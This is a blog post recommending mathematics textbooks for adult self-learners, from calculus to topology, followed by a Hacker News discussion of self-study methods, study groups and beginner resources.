For me personally, I spend around 10 hours most weeks doing math and I've had brief bursts where I've done as much as 30hrs/week when I'm between contracts, etc. What that does mean though is that one hard exercise can completely block your progress for weeks if you let it, and I'll say right now, when that does happen, it can be quite demoralizing.

Ultimately, my advice is to let your intuition and energy levels guide you - do you have the energy to chase this really hard problem down or are you in the mood for just learning the answer now? If you just want the answer now so you can move forward, look it up! There's no penalties here. You didn't lose.

I know it feels unnatural to not set hard rules around how long you should spend on a given problem, but remember that ultimately you're optimizing for your enjoyment (that's why you're doing this, right?) and long term consistency.

You will do yourself a disservice (in maths, and in life) if you burn out hot and fast.

Multivariable Calculus

MIT OCW Multivariable Calculus

The MIT OCW Multivariable Calculus course is the best resource I've found for getting comfortable with multivariable calculus. I don't really know of any good books covering this subject (no, please don't say Stewart) and I found the MIT course to be really enjoyable. Good collection of problems and worked solutions, clear material and lectures. And if I'm honest, as a self-learner who went to a good but not great university, there is also something quite satisfying about 'sitting' an exam from MIT in the same conditions as an MIT student would experience and completely acing the exam.

Differential Equations

Ordinary Differential Equations (Dover) - Tenenbaum and Pollard

ODEs get a bit of a bad rap for being a quite boring subject, and I think many people view the process of learning about differential equations as being about internalizing an almost random collection of 'tricks' to solve certain ODE forms. But it doesn't have to be that way, and I learned that from working through this book. While this book leans heavily into the applied/computational side of mathematics, it also does a great job complementing the examples and exercises with theory. It does feel a bit dated at times (it was written in 1985) and could probably benefit in certain places with some visual aids, but if you're comfortable with Python and plotting/graphical libraries you can make it up yourself as you go along. Overall, the book moves along at a fairly gentle pace - you're unlikely to get stuck as you work through the book as long as you're diligent, all the exercises have solutions, and being a Dover book, it's really cheap!

Analysis

Principles of Mathematical Analysis - Rudin

Rudin's Principles of Mathematical Analysis, also affectionately known as Baby Rudin, is a difficult, serious book but if you made your way through Spivak and all the books I've shared so far, you've got all the tools you need to succeed to make it through this. Occasionally you'll see this recommended as the first book people should learn analysis from, but I think that's a big mistake for us self-learners: it's dry, contains little in the way of motivation/exposition and has quite a few 'fill in the blanks' moments.

Note that although this book does not have any official solutions, there is a reddit community that has been working through the book, crowd-sourcing and documenting solutions. The community is at https://www.reddit.com/r/babyrudin/ and the crowd-sourced solutions document can be found here.

Algebra

A Book of Abstract Algebra (Dover) - Pinter

I'm really excited to recommend Pinter's A Book of Abstract Algebra and the truth is if the subject of Abstract Algebra is of real interest to you, this is the kind of book you can pick up and work through very early on - as early as after finishing your first book of proofs (and if you're clever, even before that). The chapters are quite short, with each chapter accompanied by a pretty hefty set of exercises which expand on the content. The book covers all the usual suspects: groups, rings, etc. and ultimately builds its way up to Galois Theory. One important thing to note is the book only contains solutions to selected exercises but the exercises are not too hard, so this shouldn't be too much of a problem.

One funny sidenote: I've heard it said on many occasions that mathematicians typically fall into one of two camps: those who like algebra (algebraists), and those who like analysis (analysts). It's even been observed that analysts tend to eat corn in spirals, while algebraists in rows. After now getting your first taste of algebra, which camp do you think you're in and does the corn theory hold true?

Abstract Algebra - Dummit and Foote

While Pinter's A Book of Abstract Algebra is excellent, it only covers a small sliver of topics from the field of abstract algebra. By contrast, Abstract Algebra is massive, and covers a lot of ground. You could almost affectionately call it a reference, but at the same time it also has a lot of those same qualities that make it excellent for self-study - lots of examples and exercises, good motivation and descriptions, etc. Just a note though that it does not come with solutions to the exercises, but given its popularity, it's quite easy to find them online.

To reiterate, this is a big book and I haven't myself worked my way through it entirely, but rather just picked it up now and then and absorbed small bits and pieces at a time...in many ways treating it like a reference instead of something to work through from start to finish.

If you can, buy the hardcover. Books this big don't fare as well as paperback.

Topology

Topology - Munkres

Focusing on point set Topology, Munkres' Topology is widely considered to be one of the best introductory books in the field. Topology is a quite difficult subject to grasp and it took me several attempts to get going - I admit to feeling much like Hitler in Hitler learns topology for a very long time until finally things started to click. Part 2 of the book contains a nice introduction to algebraic topology but I'll admit now at the time I got to this material I was already struggling a bit and have never revisited the material.

Introduction to Topology (Dover) - Mendelson

This was the book that really helped me get Topology. If you're finding Munkres a bit difficult to get going, this book is both cheaper and has a bit more exposition - there's a lot more hand-holding and the book takes its time to help you build up the intuition for why things work. In my opinion, this is the better book of the two for self-learners.

Number Theory

Elementary Number Theory - Jones

Elementary Number Theory is a great book for anyone who wants to jump in to number theory first and may have skipped some of the previously mentioned books on algebra, as it assumes very little prior knowledge. This was certainly the case for me, where I worked through this book shortly after my first proofs book. In terms of difficulty, it was perfect for me at the time, but on reflection now it might be too easy for some. If that's the case, take a look at An Introduction to the Theory of Numbers which I think would be the next best step up in difficulty and maturity.

Number Theory (Dover) - Andrews

George Andrews is one of the leading experts in the field of partitions and this book provides an excellent first introduction to the field along with a good selection of other topics (with a combinatorial focus). It's quite a short book, but manages to pack a lot in and has a great selection of exercises (with solutions to selected exercises). If you've ever heard the 'Rogers-Ramanujan identities' and wanted to learn more, this book is the perfect study companion.

Probability

Introduction to Probability, Statistics, and Random Processes - Pishro-Nik

While focusing more on the applied side of probability and statistics (this book doesn't go anywhere near measure theory), this book ended up being a really pleasant surprise for me in a field that I wasn't particularly interested in and have always found a bit dry. It also doesn't really assume much in the way of prior knowledge except for a little multivariable calculus and linear algebra, making it very approachable. I think engineers working in the fields of machine learning and data science in particular would really benefit from working through this book.

Other

What follows is a collection of books and resources I also highly recommend, but somewhat off the beaten path and chosen by me more for personal interest.

What Is Mathematics? - Courant and Robbins

What Is Mathematics is a classic and it's one that I thoroughly enjoyed reading...eventually. Why eventually? While it's claimed to be an 'elementary' book for the 'beginner', in truth, if you gave this book to any but the most gifted high-school graduate it would absolutely crush them within the first ~20 pages. And such was the case with me, where I picked this book up and tried to work through it very early on in my learning journey. Unless you're brilliant (and I surely am not), I really would recommend only tackling this book after working through a proofs book and some of the foundation books I recommended earlier. The book itself is quite broad in the subject matter it covers - number theory, geometric constructions, projective geometry, topology, and finally on to calculus. It's actually a really playful and fun book and manages really well to avoid getting bogged down too much in any one area. I highly recommend it...just make sure you don't start it before you're ready.

Naive Set Theory (Dover) - Halmos

Naive Set Theory gets right to the heart of the set-theoretic underpinnings of mathematics and does it extremely well. It is an extremely readable book, and in my opinion Halmos was one of the best mathematical expositors ever (interesting aside: Halmos invented the 'iff' notation for that wonderful phrase 'if and only if' and also the ∎ notation to signify the end of a proof!). It contains only a small handful of exercises. This book was my first exposure to proper set theory and I really enjoyed it.

The Cauchy-Schwarz Master Class - Steele

You can almost think of The Cauchy-Schwarz Master Class as an exercises/problem solving book for inequalities...as I worked through it I couldn't help but think this book would basically be the perfect bootcamp for dealing with tricky inequalities in a competitive math setting. It's got that quality of books like Polya's How to Solve It and others in that its always prodding you to think creatively and work the problems. And working through it, you also come to appreciate just how damn versatile the Cauchy-Schwarz inequality is!

Prime Numbers and the Riemann Hypothesis - Mazur and Stein

I'm currently reading this book right now!

Connecting with the broader math community

At least for me, studying mathematics has been a fairly isolated experience and I've never really found a good community to participate in. There are a couple of communities I'm aware of though, and of these, /r/math and the AoPS Community seem to be the most active. There's also the Math StackExchange, which is very active, but I find it hard to classify that as a community.

I also really like Grant Sanderson's 3Blue1Brown YouTube Channel - he has a lot of excellent general interest math videos with just the right amount of rigor.

Incidentally, if you're interested in talking math with someone, I'd love to hear from you and probably the best place to connect with me is on Twitter: @neilwithdata

What's next

There's a couple of books I've heard great things about that I'm really interested in reading next. They are (in no specific order):

Mathematics: Its Content, Methods and Meaning - I actually own the Kindle edition of this but as with many math books, it has not been converted to digital format well. I'm really looking forward to picking up the print copy and having a go at this.

Visual Complex Analysis - Some chapters in the TOC look quite familiar to me, and others I have no idea about...which is quite exciting!

Introductory Functional Analysis with Applications - I've heard this is one of the best introductory books for functional analysis.

Some parting advice

I'm currently 35 years old, and while studying mathematics have had two wonderful kids and co-founded a startup (and I've also just started a new small business building Slack and Microsoft Teams apps and integrations). Suffice to say, life has been busy. So I wanted to offer some more general advice for anyone who also wants to study math while also staying sane. Here is what has helped me:

  • Exercise. It turns out that you're not just a brain in a tank and the mind-body connection has an immense impact on your daily happiness and well-being. Exercise every day.

  • Take regular breaks and go for walks. Seemingly intractable problems have a surprising way becoming tractable after a long walk. Sunshine also has a wonderful effect on improving your overall mood and helping you sleep better.

  • Alternate between easier and harder content. One way you're sure to burn out is if you are always pushing, without periods of rest. Make sure you follow up hard books with easier, almost routine, books. Sometimes it can even be beneficial to work on two books at once - one easy, one hard. Make sure to pepper in little easy wins everywhere in between the big meaty hard problems. Always follow up 'failure' (ie. this problem is too hard, I give up) with 'success'.

  • Spend time with friends and family. Self-studying maths can be a bit isolating, but ultimately we're wired to be social creatures. Don't neglect your friends and family. Invest in good relationships with people you love to be around.




All Comments: [-] | anchor

dr_dshiv(4049) 1 day ago [-]

Does anyone know a good historical approach to maths? Like, start with Pythagoras?

Even something purely in the modern era, learning about Fourier and Weiner, harmonic analysis, etc.

dr_dshiv(4049) 1 day ago [-]

The best historical treatment I've yet found is the Time-Life book on mathematics. https://www.amazon.com/Mathematics-David-Bergamini/dp/B0007G...

I know that Freeman Dyson attributes his proficiency in math to his love of math, which he claims was kindled as a teenager by reading Bell's 'Men of Mathematics'

leto_ii(10000) 1 day ago [-]

Does anybody have any experience with How to Prove It? by Velleman? Recently I was thinking of starting on it, but I'm not sure about the level of commitment necessary.

manu_ss(10000) 1 day ago [-]

Seems to have some intro to logic and math language, if you have never read an math books as the ones referred in this post, that book should be a nice way to ease into it.

strls(4292) about 23 hours ago [-]

I worked through this book to learn how to do proofs. It turned out way more fun than I expected. The book really did demystify proofs for me. It took several months of studying - there are many exercises. But completely worth it. I'm glad I have read this book before studying Group theory and Real analysis.

dorchadas(4314) 1 day ago [-]

I think it's great that people are posting book links like this, however, what I've found most helpful is actually having someone to help guide you.

I realize how lucky I was that I found a Discord server ran by a math PhD graduate who is willing to help us guide our learning. From this, I've started learning Algebra and Analysis (just starting with the latter). It's nice to have someone to discuss problems with when you get stuck and to guide you. Likewise, he can suggest exactly which problems I should do for a give chapter, that way I don't spend my time doing ones that just repeat the same simple things over and over and can focus on nice, conceptual ones. So, if you can, please try to find someone to help guide you, or be that guide for someone else! Having it has made me seriously consider going back for a mathematics masters (and maybe PhD), switching from my physics background.

nubb(10000) 1 day ago [-]

Could you share the discord server? Thank you.

mathgenius(352) 1 day ago [-]

I would say that learning mathematics is virtually impossible without a teacher. Like, would you try learning Karate without a teacher? How about if you get with a bunch of friends and you all try to learn it together? No way.

Even the professionals try to find someone to learn a new concept from. There's something about mathematical writing that is too fragile/brittle for wetware.

One other strategy: I've noticed the really smart (arrogant?) people just don't bother reading new mathematics, they re-invent it themselves. It's actually worth trying if you can stomach it.

wyqydsyq(10000) 1 day ago [-]

As someone who dropped out of highscool after 10th grade and never went to university/college one great way I've found for learning mathematics without any foundational basis is trying to learn CG/3D programming.

I always felt like maths was too abstract to keep me engaged, but when the output of your work is immediately observable visually it becomes a lot more engaging. There's just something so much more satisfying being able to 'see' the results.

Plus as a self-taught programmer, I find it much easier to learn front-to-back by deciding on a desired outcome and working towards it, rather than progressively building up abstract fundamental skills that can later be combined to achieve a desired outcome (which is essentially the traditional academia path for learning STEM fields)

ducaale(1492) about 21 hours ago [-]

This is why I love to do game development without using a game engine. It gives you a reason to learn math, optimize your code down to the metal, all while having fun playing your game.

laichzeit0(10000) 1 day ago [-]

I pretty much followed the same route as OP re-studying mathematics seriously after 10 years in industry after initially doing a CS degree and doing mostly software engineering but transitioning into Data Science the last 3 years. When I saw Book of Proof then Spivak then Apostol on his list I chuckled because that's exactly the route I ended up following as well. Studying from 04:30 to 06:30 in the week and about 8 hours split up over the weekend, Spivak took 8 months to complete (excluding some of the appendix chapters) but if you can force yourself to truly master the exercises - and Spivak's value is the exercises - then you're close to having that weird state called "mathematical maturity" or at least an intuition as to what that means. You can forget about doing the starred exercises, unless you're gifted. Spend a lot of time on the first few chapters (again, the exercises), it will pay off later in the book. It was a very frustrating experience and I had so much self doubt working through it, it's an absolutely brutal book. Some exercises will take you literally hours to try and figure out.

If you do Book of Proof first you will find Spivak much easier, since Spivak is very light on using set theoretic definitions of things. Even the way he defines a function pretty much avoids using set terminology. Book of Proof on the other hand slowly builds up everything through set theory. It was like learning assembly language, then going to a high level language (Spivak) and I could reason about what's going on "under the hood". Book of Proof is such a beautiful book, I wish I had something like it in high school, mathematics would have just made sense if I had that one book.

I read a quote somewhere, think it was Von Neumann that said, you never really understand mathematics, you just get used to it. Keep that in mind.

p1esk(2591) 1 day ago [-]

So, you've made all that effort, how does it help you in your new role as a data scientist? Is there anything you do now that requires 'mathematical maturity'? Or is it something that can be learned much quicker on as needed basis?

nsainsbury(3512) 1 day ago [-]

Heh, nice to find someone who walked a similar path! :-)

Ah Spivak...yes, I absolutely agree it's one of the best books to build up that mathematical maturity everyone talks about.

For me Spivak took about 6 months and I managed to do almost all of the starred exercises - Gifted? No. Brutally determined: yes. And I was quite fortunate to be in a place in life where I could put serious hours in to it at the time.

After that, I learned to relax a bit more as I realised I had pushed myself way too hard and was close to burning out. I still love looking back at that damn book though. There's just something that's so special about it...the way the exercises build upon each other and connect together. It's really unique.

hackernews7643(10000) 1 day ago [-]

One thing I don't think is discussed enough is the process of how self-learners in math get critical feedback. Most advanced level math textbooks do not have solutions to check their work against nor do they have a way to get feedback by an expert and this is essential for learning. Least with programming, you can get immediate feedback and know whether what you did is correct or not.

yuanshan(10000) 1 day ago [-]

Usually, some people will post some or almost all of the solutions online if the textbook is really famous, for instance, baby rudin.

Although rarely, some authors do provide solutions, like Knuth's books, Stephen Abbott's Understanding Anaylsis, etc.

For immediate feedback, maybe you can checkout [0] to learn some formal proof by doing interactive proving.

[0] http://wwwf.imperial.ac.uk/~buzzard/xena/natural_number_game...

BTW, you can always ask questions on https://math.stackexchange.com

chobytes(10000) 1 day ago [-]

Learn proofs well and you get pretty good and knowing when you're right. Enough for almost any problem you'll be likely to encounter in a math textbook anyway.

clircle(3797) 1 day ago [-]

It's not immediate feedback, but you do learn when you right and when you are wrong. You learn when you are bullshitting yourself. You learn that you need to be able to justify every step in a proof, and if you can't do, then you are wrong. Trying to bullshit the right answer is the most common way to end up with a faulty proof. Of course, you can also end up with a faulty proof because you can't differentiate your own bullshit from truth, but this is less common.

dwrodri(4149) 1 day ago [-]

I recently had the experience of taking my first graduate-level probability course. It assumed quite a strong familiarity with real/complex analysis, and I suffered quite heavily. Something of note was that once I finally managed to 'peel back' the analysis, the underlying intuition made a lot of sense for the simplest cases in probability (e.g. hypothesis testing between two normal distributions is a matter of figuring out whose mean you are 'closer' to).

I am of the opinion that notation is a very powerful tool for thought, but the terseness of mathematical notation often hides the intuition which is more effectively captured through good visualizations. I would really like to take self-driven 'swing' at signal processing, this time approaching it through the lens of solving problem on time-series data, since as a programmer I believe that would be quite useful and relevant.

watwatinthewat(10000) 1 day ago [-]

In my opinion, the issue here is notation and a bit more. I did about eight years of college in math, changed paths, changed careers, changed careers again to ML/DL research, and now will finish a CS undergrad degree this month.

I put it in context because it's not quite a direct comparison since I have been in greatly different situations and ages between studying math and CS, but putting that aside, I have to say I have greatly enjoyed the computer science means of teaching more than math, doubly when it comes to self-learning. Concepts in math are generally taught entwined with the means of proving those ideas. That's important if you're a grad student looking to be a math researcher, but (IMO) it is not so great if you're a newer student or learning on your own and trying to grasp the concept and big picture. A proof of a theorem can be (and too often is) a lot of detail that really doesn't help you grasp the concept the theorem provides or is used towards, often because it involves other ideas and techniques from higher levels or just different types of math, both of which are out of the scope of the student learning the topic. Worse yet, it is standard for a proof to be written almost backwards from how it would be thought out. Anyone from a math educational background has the experience in homework of solving a problem, then rewriting it almost in total reverse to be in the proper form to submit. This means not only is the proof of the theorem not useful towards conceptual understanding, reading the proof doesn't show you chronologically how you would discover it yourself. That is a lot of overhead cost to break through to get to real understanding, real learning. As you mention, notation as well is another thing you need to break through.

I have found computer science and related classes to be taught more constructively. Concept is given first, and then your job as student learner is to construct it. Coming from the ML field, I love comparing math and CS proofs of topics here. Explanations from CS people of back propagation, for example, are always visual, and books/courses will have you construct a class and methods to do the calculations. Someone with a bit of programming knowledge can follow along in their language of choice. Math explanations get into a ton of notation from Calc 3+, and it's going to take a lot of playing around and frustration to get a working system out of the explanation. Even the derivation section on Wikipedia is not something most people will understand and be able to turn into useful output.

The more I see other ways concepts are taught, the more I wish math had been taught a different way. There is a lot to break through in order to get to real understanding, just by the way it's formed and taught.

daxfohl(4234) 1 day ago [-]

This is so difficult. I've been doing it off and on for twenty years and not made much of a dent in things.

The hardest part I think is understanding and measuring your progress. In school you've got exams and classmates to compare against, profs to talk to. Alone it's much harder. 'Do I understand this well enough?' 'Did I do the problems right?' (Especially with proof problems, how do you know you're right?). 'I can work through some problems one by one, but it feels like something fundamental I'm missing. Am I, or is this chapter really just about some tools?'

Then it's way too easy to say well I'm never actually going to use any of this so why am I doing it ... and take a few months off and come back forgetting what you'd learned.

polyphonicist(10000) 1 day ago [-]

Shared a similar thought here: https://news.ycombinator.com/item?id=22401420

Yes, it is really important to learn math with study-mates. Just like in code, we do reviews, in math too, we need someone else who can review our proofs. It is even easier to make an error in a proof and believe that something is proven when it isn't. A study-mate helps to prevent us from fooling ourselves.

l_t(10000) 1 day ago [-]

I've tried a few things recently that help with that:

1. Don't do exercises unless you want to. Completionism is a trap.

2. Take notes. Rewrite things in your own words. Imagine you're writing a guide for your past self.

3. Ask questions. Anytime you write something down, pause and ask yourself. Why is this true? How can we be sure? What does it imply? How could this idea be useful?

4. Cross-reference. Don't read linearly. Instead, have multiple textbooks, and 'dig deep' into concepts. If you learn about something new (say, linear combinations) -- look them up in two textbooks. Watch a video about them. Read the Wikipedia page. _Then_ write down in your notes what a linear combination is.

Anyway, everyone's different of course, but these practices have been helping me get re-invigorated with self-learning math. Hope they help someone else out there. I welcome any feedback!

(edit: formatting)

polyphonicist(10000) 1 day ago [-]

I am going to suggest something that might go against this idea of self-studying math.

Do not do it alone. I mean, it is okay to self-learn mathematics as much as possible but don't let that be the only way to learn. Find a self-study group where you can discuss what you are learning with others.

I think the social-effect can be profound in learning. I realized this when I used to learn calculus on my own. My progress was slow. But when I found a few other people who were also studying calculus, my knowledge and retention grew remarkably. I think the constant discussion and feedback-loop helps.

With round the clock internet connectivity, it is easier to find a self-study group now than ever.

dorchadas(4314) 1 day ago [-]

Ha - I actually suggested the exact same thing before seeing your post. It's definitely much better to have a group. Since I've found this group I'm currently in, I've also been much more motivated, but also able to get feedback from more advanced people, and pare the problem numbers down to only the ones that are useful and will help me build concepts, limiting how many 'calculation' problems I have to repeat.

dentalperson(10000) 1 day ago [-]

It's not super clear to me how this actually works in practice. I've seen there is one public math meetup in SF, but the topic is usually different from the one I want to study.

I'm glad to see there are online options for groups like Stack Exchange or tighter group's like the one integerclub mentions, but I still seem to run into the same problem. For example, I'm not sure how to get a group of people that are interested in reading book X when I want to start it. If anyone has advice on that, please share.

angry_octet(3727) 1 day ago [-]

Agree. And if one is a well paid software engineer, one can definitely afford to pay a maths grad student for an hour week, preferably a bit more than whatever pittance the local univeristy pays them for being a tutor. You will progress far quicker and with fewer wrong turns. It is also far cheaper than enrolling at a university. A personal trainer for the brain.

thorn(4240) 1 day ago [-]

I am always astonished to learn that there are such self-learners in the world. I wonder how it is even possible to have a family and spend whole day building a startup - I cannot imagine that startup work is less than 8 hours a day - and then at evening they learn math or other complicated branch of science. What time and more especially how much energy they have for the family? Are these guys superhumans? I never was able to achieve such level of daily energy spent without trapping in burn out. I am not critiquing or being jealous here, just having genuine interest. How is it possible to be sustainable across so many years?

cammikebrown(10000) 1 day ago [-]

Not everyone is at a startup. I'm a bartender with a physics degree who's learning more math in my spare time for fun, and to eventually switch to some sort of data science career if I tire of bartending.

FranzFerdiNaN(4179) 1 day ago [-]

I have my doubts that the people who write these kinds of posts truly did everything they say. As you say, it just does not seem possible to thoroughly work through all those math books + raising multiple kids + maintain friendships + working out daily (as he claimed he did) + work full time + things like cleaning and shopping and other chores.

peatfreak(10000) 1 day ago [-]

I'm pretty skeptical about these 'best of' lists of books for self-directed mathematics education.

I have my own 'best of' list that is very different to this list, although there are a couple of crossovers.

If you are fortunate enough to have access to a university library (or libraries) I would _highly_ recommend inquiring about access to their general collection. I was also fortunate enough to study mathematics to a university-level three-year degree at a research university. So I had an excellent head start.

A HUGE part of my journey of collecting my 'perfect library' of mathematics self-tuition and reference books (and course books) was to do my own research on collecting the perfect titles. I started when I was in the early days of my mathematics degree and I used resources like Amazon, Usenet, libraries (already mentioned), and ... that was about it.

Another important question to ask yourself is the following:

'Why am I doing this?'

Life is short and by the time you hit middle age, if you have a family or bills to looks after, are you REALLY going to want to lock yourself away in your study room to learn Lebesgue integration instead of focusing on the rest of your life?

Consider that people fail to emphasise is that mathematics is a social activity much more than many people realize.

Exercise: Find the topics of mathematics that are important to your goals and are missing from the list and find your favorite books or two that cover/s these topics.

Exercise: Consider whether your interest in (self-directed) mathematics is so sincere such that you have a serious application in mind, that you might be better off enroling in a course? Even if it's a night course that last a couple of years, you will meet a LOT of people who can help in ways that are immensely more productive than trying to do this all by yourself.

I recently purchased volume 1 of my favorite calculus and analysis book. It's an incredible masterpiece. The coverage of topics is much broader and more interesting than Aposotol or Spivak. The latter books are both very good but they also have myopic, one-track pedagogical approaches and limited themes in their coverage.

Exercise: Find your own favorite introductory calculus book that is suitable for the motivated student.

laichzeit0(10000) 1 day ago [-]

> I recently purchased volume 1 of my favorite calculus and analysis book.

Which book would that be if I might ask? I'm wagering... Courant? ;)

angry_octet(3727) 1 day ago [-]

The most key piece of advice is to take walks. Walking is essentials for mathematics. Many times when walking with my father he would turn for home and start walking faster, and by that sign I knew that he wanted to get home and write down a lemma.

tprice7(4204) 1 day ago [-]

I emphatically agree. There is something that walking does to your brain that really helps you see the big picture.

injb(10000) 1 day ago [-]

I'm glad you posted this, because I use walks this way too. And because it reminds me of William Rowan Hamilton and the quaterions!

gavinray(10000) 1 day ago [-]

I know this is going to be the case for likely nobody, but I have browsed most of the self-study math threads that pop up here as a forever-on-my-todo-list thing and I have a remark to make:

I have yet to find a guide that does not start with the assumption that you graduated highschool.

That is a very reasonable assumption to make. We are in a community of technology and engineering, it would be a bit ridiculous to assume the people you are surrounded by did not have a fundamental base of mathematics.

But the times I have tried to go through these teach-yourself materials, it went from zero to draw-the-rest-of-the-fucking-owl real quick. [0]

I have been programming for 14 years, but stopped doing schoolwork around age 12, and never did any math beyond pre-algebra.

Does anyone know of materials for adults that cover pre-algebra -> algebra -> geometry -> trigonometry -> linear algebra -> statistics -> calculus? At a reasonably quick pace that someone with a family + overtime startup hours could still benefit from?

[0] https://i.imgur.com/RadSf.jpg

(Also, curse the Greeks for not using more idiomatic variables. ∑ would never pass code review, what an entirely unreadable identifier)

mathattack(481) 1 day ago [-]

Khan Academy is great as they start from the very beginning. If you're a good problem solver you can skip most of the videos. If you learn by videos, they're very helpful.

dhimes(2827) 1 day ago [-]

I hope I'm not too late here, but if you are in the US I would highly, highly recommend signing up for developmental classes at your local community college. You are exactly whom those classes are for. If you've tried on your own before and struggled to stay motivated, doing it in a structured way, in 15 week 'sprints', may be just the kickstart to your self-study program you need.

Disclaimer: I was a full-time community college professor for a decade. I had no idea what a resource they were. It's small money compared to either the alternative of a university or not succeeding. If you use them you will succeed. It's what they do, and they've been doing it for a very long time.

raidicy(10000) 1 day ago [-]

I'm in a similar situation. I'm having to learn linear algebra,calc,basic prob, and brush up on all of my holes in between. I haven't found a direct path, however. What has helped me is this deep learning book[0] which has spelled out very plainly what I need to learn. From there I use a combination of math is fun[1], better explained[2] and 3blue1brown. math is fun really helps by just giving you examples and definitions strictly based on the subject instead of assuming knowledge in another category. better explained helps with intuition. And, 3b1b was second to none for really painting a picture of linear algebra and calc. Even though I've had to watch the videos 3-4 times each to get it, I'm extremely happy with what I've grokked. One last resource is Eddie Woo[4]. Super clear and enthusiastic intuitive lessons from him teaching highschool and slightly beyond math

Good luck in your journey. I know how frustrating it is to not be able to find the math resources you need at an awkward level. If you happen across even better resources please share.

Also a tip that really has been helping me: when you 'read' a math equation, don't simply recite the variable names and numbers. Try to say out loud what they represent. I've found that if I can't then I don't really understand the concept I'm working with.

[0]https://d2l.ai/chapter_preliminaries/index.html [1]https://www.mathsisfun.com/ [2]https://betterexplained.com/ [3]https://www.youtube.com/channel/UCYO_jab_esuFRV4b17AJtAw [4]https://www.youtube.com/user/misterwootube/playlists?view=50...

OJFord(2780) 1 day ago [-]

> (Also, curse the Greeks for not using more idiomatic variables. ∑ would never pass code review, what an entirely unreadable identifier)

S for Sum, T for Total, N for Number, I for Index, etc. might though.

photon_lines(3982) 1 day ago [-]

I'm actually self-studying as well, and I try to compile everything I learn and the notes that I take into 'Intuitive Guides' which I'm going to make available on my github repository. I actually have a guide on Linear Algebra which you can find here:

https://github.com/photonlines/Intuitive-Overview-of-Linear-...

I'm going to release one on Maxwell's equations next week, and I started working on a Calculus and General Relativity guides as well, so hopefully it helps!

puritanicdev(10000) 1 day ago [-]

I'm in the same shoes, and as ridiculous as it sounds but I've been in programming (self-taught) for 10 years now without an especially good knowledge of math. I've been slacking in HS on math classes, despite the fact that I loved math and was really good once I sat to listen, practice and understand the material. Also, I'm painfully aware of the fact that my math is really bad and that I'm missing on utilizing it in my job, so I've decided to practice at least one hour a day on Khan Academy, and eventually enroll to comp-sci university this year.

rustybolt(10000) 1 day ago [-]

Consider getting a private maths teacher. At this level it's probably not very expensive but you'll be able to learn so much more efficiently.

FigmentEngine(10000) 1 day ago [-]

> Also, curse the Greeks for not using more idiomatic variables. ∑ would never pass code review, what an entirely unreadable identifier)

i guess its idiomatic if you know 'Greek'.. ∑ is sigma, greek letter S, so Summation. And Π is pi, for Product..

qwrshr(10000) 1 day ago [-]

the art of problem solving series

DecayingOrganic(3883) 1 day ago [-]

I'd highly recommend OpenStax math textbooks, they are completely free, openly licensed, peer reviewed, and by Rice University. They also start from Pre-algebra.

https://openstax.org/subjects/math

c3534l(4215) 1 day ago [-]

Khan Academy. Start with Khan Academy.

goto11(10000) 1 day ago [-]

I went to the local library and borrowed high-school level textbooks. Just start from the level where you absolutely understand everything, however low you need to go. Solve all the exercises. You will blaze through the easy stuff, but the exercises will make it clear to you when you need to begin paying attention.

peterhj(10000) 1 day ago [-]

I first learned about calculus from, I think, this book, 'Calculus the Easy Way' [1] (or, at least the first chapter or two). It does make use of some algebra, but you're not necessarily limited to the strict progression of pre-algebra -> algebra -> calculus.

[1] (amazon: https://www.amazon.com/Calculus-Easy-Way-Douglas-Downing/dp/...)

sriram_malhar(10000) 1 day ago [-]

Just the book for you:

'Who is Fourier: a mathematical adventure' https://www.amazon.com/Who-Fourier-Mathematical-Transnationa...

It is a simply brilliant book that takes you from basic trigonometry, logarithms and so on through calculus and finally fourier series.

br_hue(10000) 1 day ago [-]

It's nice to see that I'm not alone in this situation.

I completely ignored math during high school due to a number of reasons (bad influences, even worse teachers...). I then went to college and managed to pass through calculus classes, mostly thanks to pure mechanical memorization and professors turning a blind eye to my lack of understanding.

Since my graduation (~5 years ago) I've been trying to fill this gap, but like you perfectly described, all materials expect you to have a solid basis. I think the problem is that math is huge and people spend a good chunk of their lives learning it (4-17 for the fundamentals alone!), so we fail to see how much it involves and how hard is for somebody that didn't have a proper education to learn it.

I have been making solid (although slow) progress with https://www.khanacademy.org/. I tried to learn from the top a bunch of times, but always hit a wall and dropped it. I only started moving forward when I decided to go through the basics, algebra and trigonometry 101. It has been a hard and slow journey, but each step comes faster and becomes more rewarding.

0xdeadb00f(10000) 1 day ago [-]

I'm also in a similar situation. I graduated highschool and passed mathematics, barely. I didn't absorb any knowledge and switched classes halfway through my last year.

I'm studying CS in University now and will have to do a math-related subject and I'm quite nervous about it, because my mathematics skill is extremely low, and has been my entire life.

I've also been bookmarking guides like this but haven't gotten to looking into them (pure haziness) other than reading the introduction, which usually says 'this guide assumes highschool level mathematics'.

alenmilk(10000) 1 day ago [-]

https://schoolyourself.org/learn/algebra is great. You start from addition subtraction and go through your list for the most part. Khan academy is great too, but with schoolyourself you can walk through it a bit faster.

jostylr(4281) 1 day ago [-]

A few ideas:

* Guesstimation:Solving the World's Problems on the Back of a Cocktail Napkin. Math is a tool. Start using it with some simple arithmetic and scientific notation. Once it becomes something you can use and play in that context, everything else becomes a lot easier. This is water cooler talk and is something actually usable immediately.

* Speed Mathematics Simplified. From the 1960s. Wonderful book about doing arithmetic from left to right. Also has some good stuff about decimals/fractions/percents as well as checksums. Being quick with arithmetic and getting that number sense makes everything else easier.

* Burn Math Class. Gives an appropriate viewpoint for a lot of math. Gets a little whacky as it goes on, but the core ideas should help you take ownership of math.

* ... gap not sure what to put in ... Maybe Precalculus in a Nutshell... But play around with GeoGebra. Exploring geometry, trigonometry, and precalculus visually is key to getting an intuition about. Get to know the behaviors of the functions, but don't get lost in trig identities or solving random algebraic equations. Things like Newton's method (or the Secant Method) are more important for learning about than lots of arbitrary algebraic simplifications (they can be important too)

* Vector Calculus, Linear Algebra, and Differential Forms: A Unified Approach. At some point, if you mastered K-12 math and want to get a good mix of theory and application and efficiency, this book by John and Barbara Hubbard is really quite nice. It puts linear algebra in one of its primary contexts of being the main foundation for solving nonlinear systems.

billfruit(4265) 1 day ago [-]

I have seen the Chrystal's 'Algebra: An Elementary Textbook' as a recommendation for a guide to most of Algebra a working CS person would need. It is about 100 years old, and appears to be lacking in modern pedagogic cruft and is to the point and densely packed with useful information.

projectileboy(3438) 1 day ago [-]

although it's not exactly the resource you need to be able to work algebra problems, I highly recommend that you read https://www.feynmanlectures.caltech.edu/I_22.html - Feynman starts with "let's assume we know how to count", and in just a few pages takes you through a lot of math. Even if you don't follow all of the details, it's a nice overview.

dougabug(10000) 1 day ago [-]

